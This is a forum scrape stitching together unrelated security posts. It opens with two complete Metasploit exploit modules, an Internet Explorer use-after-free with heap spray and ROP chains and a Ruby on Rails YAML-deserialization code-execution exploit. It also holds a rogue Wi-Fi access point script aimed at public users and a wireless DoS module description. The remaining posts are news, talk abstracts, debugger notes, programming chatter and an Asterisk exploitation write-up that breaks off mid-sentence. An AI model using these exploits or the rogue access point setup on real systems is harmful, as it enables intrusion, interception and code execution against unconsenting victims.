[h=1]Microsoft Internet Explorer Option Element Use-After-Free[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb def initialize(info={}) super(update_info(info, 'Name' => "Microsoft Internet Explorer Option Element Use-After-Free", 'Description' => %q{ This module exploits a vulnerability in Microsoft Internet Explorer. A memory corruption may occur when the Option cache isn't updated properly, which allows other JavaScript methods to access a deleted Option element, and results in code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ivan Fratric', #Initial discovery 'juan vazquez', #Metasploit 'sinn3r' #Metasploit ], 'References' => [ [ 'CVE', '2011-1996' ], [ 'MSB', 'MS11-081' ], [ 'URL', 'http://ifsec.blogspot.com/2011/10/internet-explorer-option-element-remote.html' ], [ 'URL', 'http://pastebin.com/YLH725Aj' ] ], 'Payload' => { 'StackAdjustment' => -3500, }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x4f8, 'OffsetVirtualFunc' => 502 } ], [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => 0x4f8, 'OffsetVirtualFunc' => 502 } ], [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => 0x4f8, 'OffsetVirtualFunc' => 502 } ] ], 'Privileged' => false, 'DisclosureDate' => "Oct 11 2012", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name 
!= 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' when '6.0' os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end return nil end def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) js = %Q| function heap_spray() { var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } var overflow = nops.substring(0, 10); } | js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate @heap_spray_func = js.sym("heap_spray") end return js end def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? 
# Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'}) rop_payload << make_nops(t['OffsetVirtualFunc']-rop_payload.length) rop_payload << "\xeb\x04" # jmp $+6 rop_payload << [0x77c15ed5].pack("V") # 0x0c0c0c0 # stackpivot => xchg eax, esp # ret rop_payload << code else print_status("Using JRE ROP") rop_payload = generate_rop_payload('java', '') rop_payload << make_nops(t['OffsetVirtualFunc']-rop_payload.length) rop_payload << "\xeb\x08" # jmp $+10 rop_payload << [0x7c348b05].pack("V") # stackpivot => xchg eax, esp # ret rop_payload << [0x7c348b05].pack("V") # stackpivot => xchg eax, esp # ret rop_payload << code end return rop_payload end def load_exploit_html(my_target, cli) @heap_spray_func = "heap_spray" p = get_payload(my_target, cli) js = ie_heap_spray(my_target, p) #var fakeobj = unescape("%u0c0c%u0c0c"); #call to 0c0c0c0c #eax ==> 0c0c0a14 html = %Q| <!DOCTYPE html> <html> <head> <script> #{js} function ivan() { var fakeobj = unescape("%u0a14%u0c0c"); fakeobj += unescape("%u4141%u4141"); while (fakeobj.length <= 0x38/2) fakeobj += unescape("%u4141%u4141"); var formobj, selobj, optobj; selobj = document.getElementById("select1"); formobj = selobj.form; var imgarray = new Array(); for(var j = 0; j < 500; j++) { imgarray.push(document.createElement("img")); } for(var i=0;i<5;i++) { optobj = document.createElement('option'); optobj.text = "test"; selobj.add(optobj); } selobj.innerText = "foo"; for(var i = 0; i < imgarray.length; i++) { imgarray[i].title = fakeobj.substring(0, 0x38 / 2 - 1); } #{@heap_spray_func}(); formobj.reset(); } </script> </head> <body onload='ivan()'> <form method="post"> <select id="select1"> </select> </form> </body> </html> | return html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri print_status("Requesting: #{uri}") my_target = get_target(agent) # Avoid the attack 
if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end Sursa: Microsoft Internet Explorer Option Element Use-After-Free
-
[h=1]Ruby on Rails XML Processor YAML Deserialization Code Execution[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails XML Processor YAML Deserialization Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in the XML request processor of the Ruby on Rails application framework. This vulnerability allows an attacker to instantiate a remote object, which in turn can be used to execute any ruby code remotely in the context of the application. This module has been tested across multiple versions of RoR 3.x and RoR 2.x }, 'Author' => [ 'charlisome', # PoC 'espes', # PoC and Metasploit module 'lian', # Identified the RouteSet::NamedRouteCollection vector 'hdm' # Module merge/conversion/payload work ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2013-0156'], ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156'] ], 'Platform' => 'ruby', 'Arch' => ARCH_RUBY, 'Privileged' => false, 'Targets' => [ ['Automatic', {} ] ], 'DisclosureDate' => 'Jan 7 2013', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(80), OptString.new('URIPATH', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) ], self.class) register_evasion_options( [ OptBool.new('XML::PadElement', [ true, 'Pad the exploit request with randomly generated XML elements', true]) ], self.class) end # # This stub ensures that the payload runs outside of the 
Rails process # Otherwise, the session can be killed on timeout # def detached_payload_stub(code) %Q^ code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first if RUBY_PLATFORM =~ /mswin|mingw|win32/ inp = IO.popen("ruby", "wb") rescue nil if inp inp.write(code) inp.close end else if ! Process.fork() eval(code) rescue nil end end ^.strip.split(/\n/).map{|line| line.strip}.join("\n") end # # Create the YAML document that will be embedded into the XML # def build_yaml_rails2 # Embed the payload with the detached stub code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) ) yaml = "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" + "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " + "eval(%[#{code}].unpack(%[m0])[0]);' " + ": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " + ":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " + ":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n" yaml end # # Create the YAML document that will be embedded into the XML # def build_yaml_rails3 # Embed the payload with the detached stub code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) ) yaml = "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" + "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " + "eval(%[#{code}].unpack(%[m0])[0]);' " + ": !ruby/object:OpenStruct\n table:\n :defaults: {}\n" yaml end # # Create the XML wrapper with any desired evasion # def build_request(v) xml = '' elo = Rex::Text.rand_text_alpha(rand(12)+4) if datastore['XML::PadElement'] xml << "<#{elo}>" 1.upto(rand(1000)+50) do el = Rex::Text.rand_text_alpha(rand(12)+4) tp = ['string', 'integer'][ rand(2) ] xml << "<#{el} type='#{tp}'>" xml << ( tp == "integer" ? Rex::Text.rand_text_numeric(rand(8)+1) : Rex::Text.rand_text_alphanumeric(rand(8)+1) ) xml << "</#{el}>" end end el = Rex::Text.rand_text_alpha(rand(12)+4) xml << "<#{el} type='yaml'>" xml << (v == 2 ? 
build_yaml_rails2 : build_yaml_rails3) xml << "</#{el}>" if datastore['XML::PadElement'] 1.upto(rand(1000)+50) do el = Rex::Text.rand_text_alpha(rand(12)+4) tp = ['string', 'integer'][ rand(2) ] xml << "<#{el} type='#{tp}'>" xml << ( tp == "integer" ? Rex::Text.rand_text_numeric(rand(8)+1) : Rex::Text.rand_text_alphanumeric(rand(8)+1) ) xml << "</#{el}>" end xml << "</#{elo}>" end xml end # # Send the actual request # def exploit print_status("Sending Railsv3 request to #{rhost}:#{rport}...") res = send_request_cgi({ 'uri' => datastore['URIPATH'] || "/", 'method' => datastore['HTTP_METHOD'], 'ctype' => 'application/xml', 'data' => build_request(3) }, 25) handler print_status("Sending Railsv2 request to #{rhost}:#{rport}...") res = send_request_cgi({ 'uri' => datastore['URIPATH'] || "/", 'method' => datastore['HTTP_METHOD'], 'ctype' => 'application/xml', 'data' => build_request(2) }, 25) handler end end Sursa: Ruby on Rails XML Processor YAML Deserialization Code Execution
-
[h=1]Expert Finds Java 1.7 Zero-Day on High-Profile Website[/h] January 10th, 2013, 14:29 GMT · By Eduard Kovacs The security expert known as Kafeine, the curator of the Malware Don’t Need Coffee website, has come across a new Java zero-day. The vulnerability affects the latest Java 1.7 release and was found on a website that allegedly records hundreds of thousands of hits each day. Experts from AlienVault have analyzed the exploit and shown that a malicious Java applet can be used to execute code (in their example, the Calculator application from Windows). “The Java file is highly obfuscated but based on the quick analysis we did the exploit is probably bypassing certain security checks tricking the permissions of certain Java classes as we saw in CVE-2012-4681,” AlienVault’s Jaime Blasco explained. Researchers from Bitdefender are also analyzing the zero-day which, they say, has been integrated into the recently developed Cool exploit kit. While more details of the vulnerability come to light, experts advise users to disable the Java browser plug-in and avoid clicking on suspicious links. Sursa: Expert Finds Java 1.7 Zero-Day on High-Profile Website - Softpedia
-
[h=1]REPT Reverse Engineering[/h] The whole tutorial is about playing with a target and implementing new things into it. The article is not for beginners: you must already know how the tools used in this tutorial work. Tutoriale: http://199.201.127.158/index.php?dir=RCE%20Tutorials/REPT%20Reverse%20Engineering%20Techniques/ Via: REPT Reverse Engineering Techniques No. 1 - rohitab.com - Forums
-
INTRODUCTION TO ARM LINUX EXPLOITING Metin KAYA kayameti@gmail.com 2013.01.09, 15:30, Istanbul Metin KAYA - Official Web Site [EnderUNIX] http://www.twitter.com/_metinkaya This paper is the Linux version of the document http://www.signalsec.com/publications/arm_exploiting.pdf which covers exploiting ARM on Windows systems. Thanks to Celil ÜNÜVER for inspiring me. The ARM architecture is used in critical roles, e.g., mobile phones, femtocells, smallcells, SCADA systems, POS machines. Basic knowledge of ARM, GDB, GCC, C, assembly, Python, and some bash commands is necessary to understand what is going on in the document. The host machine is x86 Linux (32 bit 3.5.0 kernel), so an ARM cross compiler [1] is required for the target machine, which is ARMv7 little-endian Linux (32 bit 2.6.34 kernel). Download: http://packetstorm.foofus.com/papers/general/exploit_arm_linux_en.pdf
-
Create Wireless Rogue Access Point Description: In this video I will show you how to create a fake Access point. What is the purpose to create this Fake Access Point ? Lets see if you are in a public place you have all wifi attack gadgets, and you setup a fake access point in the public places AP name called “FreeNetOnlyForToday” maybe people will try to connect this AP - Now what can you do ? You can fire a Metasploit on it because all connections belong to you and tons of stuff you can perform. In the next video I will cover how to create a fake AP and get Passwords. Steps : - apt-get install dhcp3-server airmon-ng start wlan0 airbase-ng -e FreeNet -c 11 -v wlan0 ifconfig at0 up ifconfig at0 11.0.0.254 netmask 255.255.255.0 route add -net 11.0.0.0 netmask 255.255.255.0 gw 11.0.0.254 ---- Add Config in dhcp3 ---- Path = /etc/dhcp3/dhcpd.conf ---- Paste it this ----- ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; authoritative; subnet 10.0.0.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 10.0.0.255; option routers 10.0.0.254; option domain-name-servers 8.8.8.8; range 10.0.0.1 10.0.0.140; } iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE echo > '/var/lib/dhcp3/dhcpd.leases' ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 echo "1" > /proc/sys/net/ipv4/ip_forward If you feel boring to type all these commands no problem ? Use this Bash Script. This bash script will automate your whole process. But check all the connection in bash script or you will get an error. Source : - exploit.co.il #!/bin/bash echo "Killing Airbase-ng..." pkill airbase-ng sleep 2; echo "Killing DHCP..." pkill dhcpd3 sleep 5; echo "Putting Wlan In Monitor Mode..." 
airmon-ng stop wlan0 # Change to your wlan interface sleep 5; airmon-ng start wlan0 # Change to your wlan interface sleep 5; echo "Starting Fake AP..." airbase-ng -e FreeNet -c 11 -v mon0 & # Change essid, channel and interface sleep 5; ifconfig at0 up ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpddhcpd.conf route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254 sleep 5; iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Change eth0 to your internet facing interface echo > '/var/lib/dhcp3/dhcpd.leases' ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 & sleep 5; echo "1" > /proc/sys/net/ipv4/ip_forward Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Create Wireless Rogue Access Point
-
Iran's Real Life Cyberwar Description: Abstract The recent Stuxnet, Flame and CA compromises involving Comodo and DigiNotar had three common elements, each was government sponsored, each involved Iran and all three involved a PKI compromise. The presenter will share experience of dealing with the Iranian attack, highlighting the ways in which government sponsored attacks are very different from both 'ordinary' criminal attacks and the Hollywood view of 'cyberwarfare'. ***** Speaker: Phillip Hallam-Baker, Vice President and Principal Scientist, Comodo Inc. Dr Hallam-Baker is an internationally recognized computer security specialist credited with 'significant contributions' to the design of HTTP 1.0, the core protocol of the World Wide Web. His book 'dotCrime Manifesto: How to Stop Internet Crime' sets out the first technical blueprint for how to make the Web and the Internet a less crime permissive environment by introducing accountability controls for transactions that require them. Hallam-Baker has made significant contributions to core Internet security protocols, including XKMS, SAML, WS-Security, WS-Trust and KEYPROV. He has participated in standards groups in IETF, W3C and OASIS and played a key role in establishing the concept of Extended Validation certificates as an Industry standard. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Iran's Real Life Cyberwar - Phillip Hallam-Baker on Vimeo Sursa: Iran's Real Life Cyberwar
-
Sql Server Exploitation, Escalation And Pilfering Description: Abstract During this presentation attendees will be introduced to lesser known, yet significant vulnerabilities in SQL Server implementations related to common trust relationships, misconfigurations, and weak default settings. The issues that will be covered are often leveraged by attackers to gain unauthorized access to high value systems, applications, and sensitive data. An overview of each issue, common vectors of attack, and manual techniques will be covered. Finally newly created Metasploit modules and TSQL scripts will be demonstrated that help automate the attacks. This presentation will be valuable to penetration testers who are looking for faster ways to gain access to critical data and systems. Additionally, it should be worth while for developers and database administrators who are interested in gaining a better understanding of how to protect their applications and databases from these attacks. ***** Speakers Antti Rantasaari, Security Consultant, NetSPI Antti Rantasaari is currently a security consultant at NetSPI. He is responsible for performing security assessments and contributing to the development of the methodologies, techniques, and tools used during network and application penetration testing. Scott Sutherland, NetSPI Scott Sutherland is a Principal Security Consultant at NetSPI. Scott is responsible for the development and execution of penetration testing for the firm. He has developed a number of the proprietary tools and techniques that the company uses and also plays a major role in the skills development and training of the NetSPI network and application penetration testing team. Scott is an active participant in the information security community, regularly contributing technical security blog posts, whitepapers, and presenting at a wide variety of conferences. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. 
The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: SQL Server Exploitation, Escalation and Pilfering - Antti Rantasaari and Scott Sutherland on Vimeo Sursa: Sql Server Exploitation, Escalation And Pilfering
-
Wireless Exploitation Using Metasploit Framework Description: In this video I will show you how to use the Metasploit auxiliary DoS modules for wireless exploitation. Most of the modules are not very effective, but some, such as beacon-frame fuzzing and flooding, are. I will cover more auxiliary modules in the next video. I have used three modules. auxiliary/dos/wifi/fakeap This module can advertise thousands of fake access points, using random SSIDs and BSSID addresses. Inspired by Black Alchemy's fakeap tool. auxiliary/dos/wifi/deauth This module sends 802.11 DEAUTH requests to a specific wireless peer, using the specified source address and source BSSID. auxiliary/dos/wifi/ssidlist_beacon This module sends out beacon frames using SSID's identified in a specified file and randomly selected BSSID's. This is useful when combined with a Karmetasploit attack to get clients configured to not probe for networks in their PNL to start probing when they see a matching SSID in from this script. For a list of common SSID's to use with this script, check WiGLE - Wireless Geographic Logging Engine - SSID Stats. If a file of SSID's is not specified, a default list of 20 SSID's will be used. This script will run indefinitely until interrupted. Source : - Penetration Testing Software | Metasploit Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Sursa: Wireless Exploitation Using Metasploit Framework
-
Unraveling Some Of The Mysteries Around Dom-Based Xss Description: Abstract DOM-based XSS was first revealed to the world back in 2005 by Amit Klein, when it was an interesting theoretical vulnerability. In 2012, with the push towards Web 2.0 well into the mainstream, DOM-based XSS has become a very commonly uncovered and exploited vulnerability, but it’s poorly understood. This talk will focus on the full range of issues around DOM-based XSS. It will start with a discussion of the technical details of the vulnerability, the true nature of the risk it introduces (both likelihood and impact), and some new terminology and updated definitions about what truly is a DOM-based XSS vulnerability as compared to the standard Stored and Reflected XSS that the community is well aware of. It will then discuss the difficulties that security analysts face when trying to find DOM-based XSS flaws, and provide recommended analysis techniques that help move DOM-based XSS discovery from an art towards more of a science. And finally, it will discuss simple techniques for avoiding DOM-based XSS issues in the first place as well as how to mitigate issues that are uncovered during a security review. ***** Speaker Dave Wichers, COO, Aspect Security Dave Wichers is a cofounder and the Chief Operating Officer (COO) of Aspect Security, a company that specializes in application security services. He is also a long time contributor to OWASP including being a member of the OWASP Board since it was formed in 2003. | Dave has over 20 years of experience in the information security field, and has focused exclusively on application security since 1998. At Aspect, in addition to his COO duties, he is Aspect's application security courseware… Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source: Unraveling Some of the Mysteries around DOM-Based XSS - Dave Wichers on Vimeo Sursa: Unraveling Some Of The Mysteries Around Dom-Based Xss
-
Daca tot discutam despre asa ceva, de ce nu postati si niste proiecte facute de voi? PHP: - VL Download CMS (script pentru descarcari) - Selenity CMS (un mic portal) - Site-ul "clasei" (mi-a iesit o grafica acceptabila) - Lucrarea de licenta a unui baiat Visual Basic 6: - Yahoo! Manager v1.2 - Digital Keylogger v3.0/4.0 - Royal Crypter v3.0 - Multe alte porcarii (IP locator si mai stiu eu ce...) C#: - Vreo 3 proiecte pentru munca C++: - DarkyBinder v2.0 (primul si singurul binder pentru Linux) - FileDownloader (WinAPI) - DataKiller (sterge tot ce apuca) - Chestii de liceu/facultate (liste inlantuite, clasa pentru BigInt si alte prostii) + Sunt programator C++ (Linux), deci am scris ceva linii de cod Aproximez undeva la 50.000 de linii de cod scrise in total (in toate limbajele pe care le cunosc, mai mult sau mai putin), ceea ce mi se pare cam putin, dar este timp.
-
Deci in ultimele 3 luni ai scris peste 10000 de linii de cod in 5 limbaje diferite?
-
Ce limbaje de programare CUNOSTI? Iar prin asta vreau sa zic "In ce limbaje de programare ai scris PESTE 2000 de linii de cod?" Ati putea si sa postati cand ati scris ultima linie de cod. Votati. Evitati caterinca.
-
HyperDbg HyperDbg is a kernel debugger that leverages hardware-assisted virtualization. More precisely, HyperDbg is based on a minimalistic hypervisor that is installed while the system runs. Compared to traditional kernel debuggers (e.g., WinDbg, SoftIce, Rasta R0 Debugger) HyperDbg is completely transparent to the kernel and can be used to debug kernel code without needing serial (or USB) cables. For example, HyperDbg allows single-stepping the execution of the kernel, even when the kernel is executing exception and interrupt handlers. Compared to traditional virtual machine based debuggers (e.g., the VMware builtin debugger), HyperDbg does not require the kernel to be run as a guest of a virtual machine, while being just as powerful. Feel free to contact us for suggestions, criticisms, and bug reports through the HyperDbg google group: hyperdbg | Google Groups Further details about HyperDbg are available in the paper "Dynamic and Transparent Analysis of Commodity Production Systems" (published in the proceedings of ASE 2010). The paper can be downloaded here. Download: http://code.google.com/p/hyperdbg/
-
[h=1]Defrag Tools: #22 - WinDbg - Memory Kernel Mode[/h]By: Larry Larsen, Andrew Richards, Chad Beeder In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue looking at the Debugging Tools for Windows (in particular WinDbg). WinDbg is a debugger that supports user mode debugging of a process, or kernel mode debugging of a computer. This installment goes over the commands used to show the memory used in a kernel mode debug session. We cover these commands: !vm !vm 1 !memusage 8 !poolused 2 !poolused 4 !poolfind <tag> !pool <addr> !pool <addr> 2 !pte Make sure you watch Defrag Tools Episode #1 for instructions on how to get the Debugging Tools for Windows and how to set the required environment variables for symbols and source code resolution. Resources: Microsoft Windows SDK for Windows 7 and .NET Framework 4 Sysinternals LiveKD Sysinternals RAMMap Timeline: [00:45] - Sysinternals LiveKD debug of the machine [01:47] - Virtual Memory summary (!vm 1) [05:10] - Sysinternals LiveKD live kernel dump (livekd.exe -m -o kernel.dmp) [09:30] - Sysinternals RAMMap [11:10] - Memory List summary (!memusage 8) [16:15] - Pool Usage by Non-Paged Pool (!poolused 2) [20:16] - Pool Tags (c:\debuggers\triage\pooltag.txt) [28:06] - Pool Usage by Paged Pool (!poolused 4) [29:27] - Pool issues lead to Bugchecks [34:00] - Find Pool by Address (!pool <addr>) [36:05] - Find Pool by Tag (!poolfind <tag>) [40:30] - Page Table Entry (PTE) and Page Frame Number (PFN) (!pte <addr>) [42:45] - Sometimes it is a physical hardware failure Video: Defrag Tools: #22 - WinDbg - Memory Kernel Mode | Defrag Tools | Channel 9
-
DoS? Then Who Was Phone? Introduction This post presents exploitation notes on a vulnerability we discovered in Asterisk, an open source telephony solution produced by Digium. We reported this bug to Digium on November 27th, 2012, and provided it to customers of the Exodus Intelligence Feed as EIP-2012-0008. Digium released the advisory AST-2012-014 for this vulnerability on January 2nd, 2013, which was picked up shortly after by some of the aggregator sites and incorrectly categorized as a denial-of-service; however, this bug is certainly exploitable. As we found it fun to analyze, and since discussions about server-side memory bugs are a little sparse nowadays, we thought it would be cool to share for others who might also find it interesting. Vulnerability The vulnerability resides in the HTTP Asterisk Management Interface (AMI) service, and is the result of an alloca being used to “allocate” memory with a remotely-supplied, untrusted size value. The vulnerability is present in the Asterisk source code file main/http.c, specifically in the function ast_http_get_post_vars, which, as the name suggests, parses HTTP POST variable data.
A snip of the pertinent vulnerable code in this function is shown below: struct ast_variable *ast_http_get_post_vars( struct ast_tcptls_session_instance *ser, struct ast_variable *headers) { int content_length = 0; struct ast_variable *v, *post_vars=NULL, *prev = NULL; char *buf, *var, *val; for (v = headers; v; v = v->next) { if (!strcasecmp(v->name, "Content-Type")) { if (strcasecmp(v->value, "application/x-www-form-urlencoded")) { return NULL; } break; } } for (v = headers; v; v = v->next) { if (!strcasecmp(v->name, "Content-Length")) { content_length = atoi(v->value) + 1; break; } } if (!content_length) { return NULL; } if (!(buf = alloca(content_length))) { return NULL; } if (!fgets(buf, content_length, ser->f)) { return NULL; } The code shows the length value being converted from the Content-Length string using atoi, then incremented by one and stored in the content_length variable. Memory is obtained by alloca for the expected content length, and pointed to by buf. Finally, fgets is called to read the expected amount of content data into this buffer. I found it interesting that the code looks as though it may have been written with memory management issues in mind, as the check to ensure content_length is not zero would catch an integer overflow caused by adding one to the value. However, atoi performs no range validation: only a Content-Length of -1 produces a zero content_length, so any other negative value passes the check and is handed to alloca, where a negative int becomes a very large unsigned size. The defensive fix is to reject negative or oversized lengths before allocating, and more generally never to size a stack allocation from attacker-controlled input. Below is a snip of disassembled code for the vulnerable function as compiled in the Asterisk package shipped with Ubuntu.
This snip shows the size value being set and used to subtract the stack pointer (ESP) to “allocate” stack memory: <ast_http_get_post_vars+187>: call <strtol@plt> <ast_http_get_post_vars+192>: mov edx,eax <ast_http_get_post_vars+194>: add edx,0x1 <ast_http_get_post_vars+197>: je <ast_http_get_post_vars+408> <ast_http_get_post_vars+203>: mov ecx,DWORD PTR [ebp-0x30] <ast_http_get_post_vars+206>: add eax,0x1f <ast_http_get_post_vars+209>: and eax,0xfffffff0 <ast_http_get_post_vars+212>: sub esp,eax <----- LOL <ast_http_get_post_vars+214>: lea esi,[esp+0x1b] As shown, the alloca is compiled into a simple set of instructions to ADD and AND-off the size to be allocated from the stack. It then subtracts the revised size from the stack pointer, and stores an address derived from this into the ESI register for further use. Exploitation Obstacles Since most compilers implement alloca as a fairly direct subtraction of the stack pointer, the exploitation of alloca is often as simple as providing a size value large enough to wrap the stack pointer around to a desirable location higher on the stack. Subsequent use of the pointer to store remotely supplied data would then result in stack memory corruption, and allow for vanilla exploitation techniques to gain control of program execution flow. However, here the vulnerable code uses the function fgets to read network data into the obtained memory space. This complicates the situation for exploitation as the libc implementation of fgets performs a check on its length argument to ensure that it is not beyond the signed integer boundary of 0x7FFFFFFF. If this check fails, fgets does not read data and returns an error. 
The code snip below shows the check performed inside of fgets as implemented in libc.so.6: <fgets+0>: sub esp,0x4c <fgets+3>: mov DWORD PTR [esp+0x48],ebp <fgets+7>: mov ebp,DWORD PTR [esp+0x54] <fgets+11>: mov DWORD PTR [esp+0x3c],ebx <fgets+15>: call <mov_esp_ebx> <fgets+20>: add ebx,0x14051c <fgets+26>: mov DWORD PTR [esp+0x40],esi <fgets+30>: mov esi,DWORD PTR [esp+0x58] <fgets+34>: test ebp,ebp <fgets+36>: mov DWORD PTR [esp+0x44],edi <fgets+40>: jle <fgets+336> ... <fgets+336>: mov DWORD PTR [esp+0x50],0x0 <fgets+344>: jmp <fgets+256> ... <fgets+256>: mov eax,DWORD PTR [esp+0x50] <fgets+260>: mov ebx,DWORD PTR [esp+0x3c] <fgets+264>: mov esi,DWORD PTR [esp+0x40] <fgets+268>: mov edi,DWORD PTR [esp+0x44] <fgets+272>: mov ebp,DWORD PTR [esp+0x48] <fgets+276>: add esp,0x4c <fgets+279>: ret The EBP register, containing the length argument, is checked to be a positive signed value using the TEST and JLE instructions at <fgets+34> and <fgets+40>. If the check fails, the code jumps to <fgets+336>, zeroes the slot that is later loaded into EAX, and falls into the common epilogue, so fgets returns NULL without touching the buffer; this makes fgets unusable for exploiting a wrapped stack pointer to overwrite memory with data read from the network. While stack corruption by this means is still possible through the pushing and moving of data to the stack by other compiled code operations, the lack of control and limited set of operations make this approach undesirable. At this point some might categorize this vulnerability as purely theoretical or possibly even unexploitable. As I hope many readers would agree, a challenge of this nature is always inviting. The Exodus team loves goading and trolling one another in these scenarios, usually with something along the lines of “Yeah, it is probably too tough for you to exploit…” or “you should probably just give up.” The recipient of this pep talk usually proceeds to cry and reevaluate the code until an idea hits them or they decide to resign to a life of PCI compliance auditing. Challenge accepted. 
EIP Control After spending some time analyzing the problem and hating computers, I found a way to exploit this vulnerability. The HTTP listener for the Asterisk Management Interface handles every new connection by creating a new thread to execute a designated worker function to process the request. The code to setup and complete this task is spread out across multiple functions and macros and is a little messy, so we’ll try to keep details to a minimum. The HTTP AMI is started initially by a call chain of functions starting with ast_http_init, which calls __ast_http_load, which then calls ast_tcptls_server_start. The function ast_tcptls_server_start performs standard TCP socket setup operations, and is defined as: void ast_tcptls_server_start(struct ast_tcptls_session_args *desc) Despite the name, ast_tcptls_server_start is used for both TLS and non-TLS service setup. The single argument taken by this function is a structure describing aspects of the server to be started. From __ast_http_load, the call looks like: ast_tcptls_server_start(&http_desc); The structure structure http_desc is defined in main/http.c as: static struct ast_tcptls_session_args http_desc = { .accept_fd = -1, .master = AST_PTHREADT_NULL, .tls_cfg = NULL, .poll_timeout = -1, .name = "http server", .accept_fn = ast_tcptls_server_root, .worker_fn = httpd_helper_thread, }; The .accept_fn is a function pointer for a function to accept the connection, and the worker_fn is a pointer to the worker function responsible for processing the request once a new thread is created. After more setup code, a new thread is created to accept socket connections by calling the function ast_tcptls_server_root. For each TCP connection accepted on the listening HTTP port (default 8088), 